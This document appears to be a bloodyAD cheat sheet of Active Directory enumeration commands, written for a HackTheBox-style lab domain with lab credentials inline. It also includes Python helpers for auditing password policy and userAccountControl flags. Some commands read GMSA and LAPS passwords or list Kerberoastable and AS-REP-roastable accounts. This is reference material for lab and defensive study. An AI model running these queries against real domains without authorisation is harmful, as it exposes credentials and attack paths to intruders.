
Get Examples

Get Children

List children for a given target object.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --target "Rose"
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --target "Remote Management Users"

Get all Users

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --otype useronly

Get all computers

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --otype computer

Get all containers

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --otype container

Get Membership

Retrieve SID and SAM Account Names of all groups a target belongs to.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get membership "rose" 
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get membership "rose" --no-recurse 

Info

--no-recurse: if set, only groups of which the target is a direct member are retrieved (default: False)


Get Object

Retrieve LDAP attributes of the given target object; binary data is output as base64.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object ""
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object --attr "*" "rose"
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object --attr "*" --resolve-sd "rose"

Get members of a group

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'  get object "Domain Admins" --attr member

Get UAC of a user

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'  get object "ryan" --attr userAccountControl

Read GMSA Account Password

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'  get object 'gmsaAccount$' --attr msDS-ManagedPassword

Read LAPS Password

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'  get object 'COMPUTER$' --attr ms-Mcs-AdmPwd

Get AD forest level

Retrieves the forest functional level of the Active Directory environment.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object 'DC=sequel,DC=htb' --attr msDS-Behavior-Version

Get Machine Account Quota (MAQ)

Displays the maximum number of machine accounts a user can create in the Active Directory.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object 'DC=sequel,DC=htb' --attr ms-DS-MachineAccountQuota    

Get min Password Length

Retrieves the minimum password length policy for the domain.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object 'DC=sequel,DC=htb' --attr minPwdLength


Get Trusts

Display trusts as an ASCII tree, with the DC's domain as the tree root.

Info

  • A->B means A can auth on B.
  • A-<B means B can auth on A.
  • A-<>B means bidirectional.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get trusts
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get trusts --transitive
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --otype trustedDomain

Info

--transitive: try to fetch transitive trusts (start from a DC of your user's own domain to get more complete results) (default: False)


Get Writable Objects

Lists objects in Active Directory that can be modified by the current user.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get writable
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get writable --detail


Get all DNS records from AD

Retrieve the DNS records of the Active Directory that are readable/listable by the user.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get dnsDump
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get dnsDump | sed -n '/[^\n]*\*/,/^$/p'


Search for Users

Finds and retrieves attributes for all objects of class user.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=user)" --attr "*"
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=user)" --attr "*" --resolve-sd 

Search for Groups

Finds and retrieves attributes for all objects of class group.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=group)" --attr "*"
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=group)" --attr "*" --resolve-sd 

Search for min Password Age policy

Gets the minimum password age policy, which defines the minimum amount of time before a user can change their password.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=domain)" --attr "minPwdAge"
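The domain-level attributes queried above (msDS-Behavior-Version, ms-DS-MachineAccountQuota, minPwdLength here and minPwdAge in the previous sections) come back as raw LDAP values: minPwdAge is a negative count of 100-nanosecond ticks, and the functional level is a small integer. The following added example (not part of bloodyAD or this cheat sheet) parses bloodyAD's `attribute: value` output lines and turns them into an audit summary a defender can act on; the sample output is constructed, and the `min_length` threshold of 14 is an assumed policy baseline.

```python
"""Parse bloodyAD `get object` / `get search` output for domain policy
attributes and convert raw LDAP values into human-readable form.

Added example for this cheat sheet; not part of bloodyAD. The sample output
below is constructed in the `attribute: value` shape bloodyAD prints.
"""
from datetime import timedelta

# Values of msDS-Behavior-Version (functional level) and the Windows
# Server release each corresponds to.
BEHAVIOR_VERSION = {
    0: "Windows 2000",
    1: "Windows Server 2003 interim",
    2: "Windows Server 2003",
    3: "Windows Server 2008",
    4: "Windows Server 2008 R2",
    5: "Windows Server 2012",
    6: "Windows Server 2012 R2",
    7: "Windows Server 2016",
}


def interval_to_timedelta(raw: int) -> timedelta:
    """Convert an AD interval (negative count of 100 ns ticks) to a timedelta.

    minPwdAge, maxPwdAge and lockoutDuration are all stored this way.
    """
    return timedelta(microseconds=abs(raw) / 10)


def parse_attrs(output: str) -> dict:
    """Turn `key: value` lines from bloodyAD into a dict (last value wins)."""
    attrs = {}
    for line in output.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            attrs[key.strip()] = value.strip()
    return attrs


def audit_domain_policy(output: str, min_length: int = 14) -> dict:
    """Summarise the policy attributes found in `output`.

    `min_length` is an assumed baseline for flagging a weak minPwdLength.
    """
    attrs = parse_attrs(output)
    findings = {}
    if "minPwdAge" in attrs:
        findings["minPwdAge"] = interval_to_timedelta(int(attrs["minPwdAge"]))
    if "minPwdLength" in attrs:
        length = int(attrs["minPwdLength"])
        findings["minPwdLength"] = length
        findings["weak_min_length"] = length < min_length
    if "ms-DS-MachineAccountQuota" in attrs:
        # Any quota above 0 lets ordinary users join computer objects;
        # hardening guidance is to set it to 0.
        maq = int(attrs["ms-DS-MachineAccountQuota"])
        findings["machineAccountQuota"] = maq
        findings["users_can_add_computers"] = maq > 0
    if "msDS-Behavior-Version" in attrs:
        level = int(attrs["msDS-Behavior-Version"])
        findings["functionalLevel"] = BEHAVIOR_VERSION.get(level, f"unknown ({level})")
    return findings


# Constructed sample output: one domain object with the attributes above.
SAMPLE_OUTPUT = """\
distinguishedName: DC=sequel,DC=htb
minPwdAge: -864000000000
minPwdLength: 7
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
"""

if __name__ == "__main__":
    for key, value in audit_domain_policy(SAMPLE_OUTPUT).items():
        print(f"{key}: {value}")
```

Pipe the real bloodyAD output into `audit_domain_policy` (for example by reading stdin) to get the same summary for a live domain; the conversion of the tick count works for maxPwdAge and lockoutDuration as well.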

Search Kerberoastable accounts

Identifies accounts with Service Principal Names (SPNs) that can be targeted for Kerberoasting attacks.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter '(&(samAccountType=805306368)(servicePrincipalName=*))' --attr sAMAccountName | grep sAMAccountName | cut -d ' ' -f 2

Search accounts that do not require Kerberos pre-authentication (AS-REP)

Finds accounts that do not require Kerberos pre-authentication, making them vulnerable to AS-REP roasting attacks.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
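The AS-REP filter above and the "Get UAC of a user" command earlier both rely on userAccountControl bit flags: `1.2.840.113556.1.4.803` is the LDAP bitwise-AND matching rule, `4194304` (0x400000) is DONT_REQ_PREAUTH and `2` is ACCOUNTDISABLE. The added example below (not part of bloodyAD or this page) decodes a userAccountControl value into flag names, reproduces the filter's predicate in Python, and runs it over constructed bloodyAD-style search output so the result can be cross-checked against what the server returned. It accepts either the raw integer or a semicolon-separated list of flag names, since bloodyAD may print the decoded names; both sample forms are constructed.

```python
"""Decode userAccountControl and reproduce the AS-REP LDAP filter predicate.

Added example; not part of bloodyAD. Sample output lines are constructed.
"""

# Well-known userAccountControl bits (subset relevant to account auditing).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
NAME_TO_BIT = {name: bit for bit, name in UAC_FLAGS.items()}


def decode_uac(value: int) -> list[str]:
    """Return the names of all known flags set in `value`, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def parse_uac(raw: str) -> int:
    """Accept the integer form or a 'NAME; NAME' list and return the bitmask."""
    raw = raw.strip()
    if raw.lstrip("-").isdigit():
        return int(raw)
    value = 0
    for name in raw.split(";"):
        value |= NAME_TO_BIT.get(name.strip(), 0)  # unknown names are ignored
    return value


def bit_and(value: int, mask: int) -> bool:
    """Semantics of LDAP_MATCHING_RULE_BIT_AND (OID 1.2.840.113556.1.4.803):
    true when every bit of `mask` is set in `value`."""
    return value & mask == mask


def asrep_exposed(uac: int) -> bool:
    """Same predicate as the search filter: DONT_REQ_PREAUTH set AND not disabled."""
    return bit_and(uac, 0x400000) and not bit_and(uac, 0x2)


def parse_search_output(output: str) -> dict[str, int]:
    """Group bloodyAD `key: value` lines into objects (a new object starts at
    distinguishedName) and map sAMAccountName -> userAccountControl bitmask."""
    blocks, current = [], {}
    for line in output.splitlines():
        key, sep, val = line.partition(": ")
        if not sep:
            continue
        if key == "distinguishedName" and current:
            blocks.append(current)
            current = {}
        current[key] = val.strip()
    if current:
        blocks.append(current)
    return {
        b["sAMAccountName"]: parse_uac(b["userAccountControl"])
        for b in blocks
        if "sAMAccountName" in b and "userAccountControl" in b
    }


def exposed_accounts(output: str) -> list[str]:
    """Names of enabled accounts that do not require pre-authentication."""
    return sorted(n for n, uac in parse_search_output(output).items() if asrep_exposed(uac))


# Constructed sample: one exposed account, one disabled account, one normal user.
SAMPLE_OUTPUT = """\
distinguishedName: CN=rose,CN=Users,DC=sequel,DC=htb
sAMAccountName: rose
userAccountControl: 4260352
distinguishedName: CN=svc_old,CN=Users,DC=sequel,DC=htb
sAMAccountName: svc_old
userAccountControl: NORMAL_ACCOUNT; ACCOUNTDISABLE; DONT_REQ_PREAUTH
distinguishedName: CN=ryan,CN=Users,DC=sequel,DC=htb
sAMAccountName: ryan
userAccountControl: 512
"""

if __name__ == "__main__":
    for name, uac in parse_search_output(SAMPLE_OUTPUT).items():
        print(f"{name}: {', '.join(decode_uac(uac))}")
    print("pre-auth not required and enabled:", exposed_accounts(SAMPLE_OUTPUT))
```

Because `asrep_exposed` mirrors the filter exactly, the list it produces from a full `(objectClass=user)` dump should match what the server returns for the filtered query; a mismatch points at an attribute the parser did not see or at a disabled account that was counted.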